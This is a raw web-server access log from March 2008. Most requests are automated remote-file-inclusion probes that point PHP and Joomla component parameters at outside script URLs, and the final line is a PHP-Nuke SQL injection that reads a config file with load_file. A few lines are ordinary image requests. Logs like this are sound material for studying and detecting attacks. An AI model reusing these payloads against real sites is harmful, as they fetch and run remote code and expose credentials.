87.117.225.155 - - [02/Mar/2008:06:43:49 -0800] "GET /index.php?pag=http://www.grupslactancia.info/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [02/Mar/2008:06:46:18 -0800] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [02/Mar/2008:06:46:18 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:06:46:19 -0800] "GET /logs/access_080211.log/index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:06:46:19 -0800] "GET /index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:06:46:20 -0800] "GET /logs/index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.55.148.27 - - [02/Mar/2008:06:47:25 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:47:46 -0800] "GET /logs/access.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.138 - - [02/Mar/2008:06:47:58 -0800] "GET /logs/access_080211.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:06:48:17 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:48:53 -0800] "GET /logs/access.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.52.224.47 - - [02/Mar/2008:06:49:29 -0800] "GET /logs/access_071230.log/index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://www.zlaja.de//phpkit/templates/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.224.47 - - [02/Mar/2008:06:49:30 -0800] "GET /index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://www.zlaja.de//phpkit/templates/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.224.47 - - [02/Mar/2008:06:49:30 -0800] "GET /logs/index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://www.zlaja.de//phpkit/templates/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.224.47 - - [02/Mar/2008:06:49:53 -0800] "GET /logs/access_071230.log/index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://www.zlaja.de//phpkit/templates/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.224.47 - - [02/Mar/2008:06:49:53 -0800] "GET /index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://www.zlaja.de//phpkit/templates/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.224.47 - - [02/Mar/2008:06:49:53 -0800] "GET /logs/index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://www.zlaja.de//phpkit/templates/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.224.47 - - [02/Mar/2008:06:51:16 -0800] "GET /index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://www.zlaja.de//phpkit/templates/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.52.224.47 - - [02/Mar/2008:06:52:04 -0800] "GET /logs/access.log/index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://www.zlaja.de//phpkit/templates/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [02/Mar/2008:06:52:12 -0800] "GET /logs//include.php?path[docroot]=http://h1.ripway.com/durhaka/cmdasca.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.185.237.35 - - [02/Mar/2008:06:52:17 -0800] "GET //include.php?path[docroot]=http://h1.ripway.com/durhaka/cmdasca.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:06:52:21 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.191.16.11 - - [02/Mar/2008:06:52:22 -0800] "GET /logs/access.log//index.php?pag=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.232.66.107 - - [02/Mar/2008:06:52:36 -0800] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
77.232.66.107 - - [02/Mar/2008:06:52:36 -0800] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:52:43 -0800] "GET /logs/access_080201.log/send_reminders.php?includedir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:52:43 -0800] "GET /logs/access_080201.log/send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:52:44 -0800] "GET /logs/send_reminders.php?includedir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:52:44 -0800] "GET /logs/send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.52.224.47 - - [02/Mar/2008:06:52:44 -0800] "GET /logs/access.log/index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://www.zlaja.de//phpkit/templates/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:53:01 -0800] "GET /logs/access.log/index1.php?pag=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:53:10 -0800] "GET /logs/access.log/index1.php?pag=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.101.125 - - [02/Mar/2008:06:53:19 -0800] "GET /logs/access_080121.log/send_reminders.php?includedir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.101.125 - - [02/Mar/2008:06:53:27 -0800] "GET /logs/send_reminders.php?includedir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.35 - - [02/Mar/2008:06:53:43 -0800] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://h1.ripway.com/durhaka/cmdasca.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.185.237.35 - - [02/Mar/2008:06:53:43 -0800] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://h1.ripway.com/durhaka/cmdasca.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.93.148.36 - - [02/Mar/2008:06:53:43 -0800] "GET /logs/access_080119.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:53:53 -0800] "GET /logs/access_080121.log/send_reminders.php?includedir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.89.137.99 - - [02/Mar/2008:06:53:53 -0800] "GET /logs/access_080121.log/send_reminders.php?includedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:06:53:54 -0800] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:06:53:55 -0800] "GET /logs/access_080211.log/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:06:53:55 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:06:53:55 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:06:53:55 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:06:53:55 -0800] "GET /logs/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
65.182.101.125 - - [02/Mar/2008:06:54:02 -0800] "GET /logs/access_080104.log/send_reminders.php?includedir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.82.216 - - [02/Mar/2008:06:55:39 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.82.216 - - [02/Mar/2008:06:55:44 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.82.216 - - [02/Mar/2008:06:55:51 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:06:56:02 -0800] "GET /logs/access_080211.log/index2.php?x=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:06:56:02 -0800] "GET /index2.php?x=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:06:56:03 -0800] "GET /logs/index2.php?x=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.1.32.41 - - [02/Mar/2008:06:56:06 -0800] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7466.jpg HTTP/1.1" 200 187662 "http://www.st-owners.com/forums/showthread.php?t=36514" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
66.1.32.41 - - [02/Mar/2008:06:56:07 -0800] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7455.jpg HTTP/1.1" 200 247528 "http://www.st-owners.com/forums/showthread.php?t=36514" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
66.1.32.41 - - [02/Mar/2008:06:56:07 -0800] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7470.jpg HTTP/1.1" 200 154937 "http://www.st-owners.com/forums/showthread.php?t=36514" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
66.1.32.41 - - [02/Mar/2008:06:56:07 -0800] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7723.jpg HTTP/1.1" 200 162632 "http://www.st-owners.com/forums/showthread.php?t=36514" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
66.1.32.41 - - [02/Mar/2008:06:56:08 -0800] "GET /bikes/dteel/2008_02_16/Arryo_Seco/IMG_7526.jpg HTTP/1.1" 200 152952 "http://www.st-owners.com/forums/showthread.php?t=36514" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
216.191.16.12 - - [02/Mar/2008:06:56:43 -0800] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.12 - - [02/Mar/2008:06:56:45 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.12 - - [02/Mar/2008:06:56:45 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.1.32.41 - - [02/Mar/2008:06:57:08 -0800] "GET /bikes/dteel/2008_02_16/Arryo_Seco/ HTTP/1.1" 200 8443 "http://www.st-owners.com/forums/showthread.php?t=36514" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
66.1.32.41 - - [02/Mar/2008:06:57:12 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
66.1.32.41 - - [02/Mar/2008:06:57:13 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:57:28 -0800] "GET /logs/access_080201.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:57:32 -0800] "GET /index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:57:42 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:57:42 -0800] "GET /logs/access_080201.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:57:52 -0800] "GET /index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:06:57:55 -0800] "GET /logs/access_080131.log/index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:06:58:16 -0800] "GET /logs/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:06:58:26 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.109.123.107 - - [02/Mar/2008:06:58:26 -0800] "GET /logs/access_080103.log/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
216.191.16.12 - - [02/Mar/2008:07:00:12 -0800] "GET /logs/access_080107.log//components/com_simpleboard/image_upload.php?sbp=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:07:00:21 -0800] "GET /logs/access_080122.log//oneadmin/photogallery/include.php?path[docroot]=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:07:00:21 -0800] "GET /logs/access_080122.log/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:07:00:22 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:07:00:22 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:07:00:23 -0800] "GET /logs/access_080122.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:07:00:23 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:07:00:23 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:07:00:23 -0800] "GET /logs/access_080118.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:07:00:23 -0800] "GET /logs/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.227.82.216 - - [02/Mar/2008:07:01:11 -0800] "GET /logs/access_080117.log/tools/send_reminders.php?noSet=0&includedir=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.191.99.203 - - [02/Mar/2008:07:02:35 -0800] "GET /presto/ HTTP/1.1" 200 526 "DELBY FILSECLAB FIREWALL WWW.FILSECLAB.COM" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MAXTHON 2.0)" "www.dmulk.com"
72.191.99.203 - - [02/Mar/2008:07:02:40 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; MAXTHON 2.0)" "www.dmulk.com"
216.191.16.14 - - [02/Mar/2008:07:02:44 -0800] "GET /logs/access_080127.log//components/com_smf/smf.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.14 - - [02/Mar/2008:07:02:44 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.14 - - [02/Mar/2008:07:02:45 -0800] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.29.164.6 - - [02/Mar/2008:07:03:37 -0800] "GET /logs/access_080117.log/index2.php?x=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:07:04:08 -0800] "GET /logs/access_080131.log/index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:07:04:09 -0800] "GET /index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.109.192.16 - - [02/Mar/2008:07:04:09 -0800] "GET /logs/index.php?body=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:07:04:38 -0800] "GET /logs/access_080122.log/components/com_simpleboard/image_upload.php?sbp=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.80.70.21 - - [02/Mar/2008:07:04:38 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.schuleniederwil.ch/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:07:04:54 -0800] "GET /logs/access_080207.log//oneadmin/photogallery/include.php?path[docroot]=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:07:04:54 -0800] "GET /logs/access_080207.log/errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
208.16.236.69 - - [02/Mar/2008:07:05:10 -0800] "GET /index.php?pagina1=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.66.107 - - [02/Mar/2008:07:05:24 -0800] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
77.232.66.107 - - [02/Mar/2008:07:05:24 -0800] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
216.191.16.13 - - [02/Mar/2008:07:06:00 -0800] "GET /logs/access_080221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.13 - - [02/Mar/2008:07:06:00 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.13 - - [02/Mar/2008:07:06:00 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.27.34 - - [02/Mar/2008:07:06:08 -0800] "GET /logs/access.log/index.php?pageurl=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
213.198.27.34 - - [02/Mar/2008:07:06:08 -0800] "GET /index.php?pageurl=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
213.198.27.34 - - [02/Mar/2008:07:06:09 -0800] "GET /logs/index.php?pageurl=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
213.198.27.34 - - [02/Mar/2008:07:06:10 -0800] "GET /logs/access_080208.log/index.php?pageurl=http://www.visitesantacatarina.com.br/banner/safeon.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
216.191.16.14 - - [02/Mar/2008:07:06:23 -0800] "GET /logs/access_080208.log//components/com_smf/smf.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.13 - - [02/Mar/2008:07:06:55 -0800] "GET /logs/access_080208.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.9.138 - - [02/Mar/2008:07:07:02 -0800] "GET /logs/nuke_authors/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,concat(0x4861636B65642042792062696C6C67617465,0x3A,load_file(0x2e2f61646d696e2f70636f6e6669672e706870)/**/from/**/mysql.user/*/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2 HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
